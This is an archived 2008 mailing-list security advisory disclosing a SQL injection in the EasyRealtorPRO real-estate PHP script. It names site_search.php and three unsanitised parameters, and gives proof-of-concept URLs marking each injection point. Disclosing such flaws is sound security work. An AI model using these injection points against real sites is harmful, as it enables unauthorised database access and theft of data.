lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1f9bad3a0809251231t224fb515nee573b95eafe276b@mail.gmail.com>
Date: Thu, 25 Sep 2008 20:31:25 +0100
From: SmOk3 <smok3f00@...il.com>
To: vuldb@...urityfocus.com, vuln@...unia.com, bugs@...uritytracker.com, 
	bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: SQL Injection in EasyRealtorPRO 2008

Original article:
http://www.davidsopas.com/2008/09/sql-injection-in-easyrealtorpro/


"EasyRealtorPRO 2008 provides you with all features you need to setup
your own business oriented real estate website on your own domain
name. Our support team will install the script on your server and then
you can start selling packages to home sellers at ease." in vendor
website easyrealtorpro.com

This PHP script is vulnerable to SQL Injection in site_search.php file.

Manipulating the unfiltred variables, a user can execute SQL commands
to gather other information. The problem is located under the
variables item, search_ordermethod and search_order.

Proof of concept:

site_search.php?search_purpose=sale&search_type=&
search_price_min=&search_price_max=&search_bedroom=1&
search_bathroom=1&search_city=&search_state=&
search_zip=&search_radius=&search_country=&
search_order=type&search_ordermethod=asc&page=2&
item=5'SQL INJECTION

site_search.php?search_purpose=sale&search_type=&
search_price_min=&search_price_max=&search_bedroom=1&
search_bathroom=1&search_city=&search_state=&
search_zip=&search_radius=&search_country=&
search_order=type&search_ordermethod=asc'SQL INJECTION&
page=2&item=5

site_search.php?search_purpose=sale&search_type=&
search_price_min=&search_price_max=&search_bedroom=1&
search_bathroom=1&search_city=&search_state=&
search_zip=&search_radius=&search_country=&
search_order=type'SQL INJECTION&search_ordermethod=asc&
page=2&item=5

Solution: The vendor was contacted 2 weeks ago and still not reply to
my email. It can be fixed with the sanitize of the variables.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ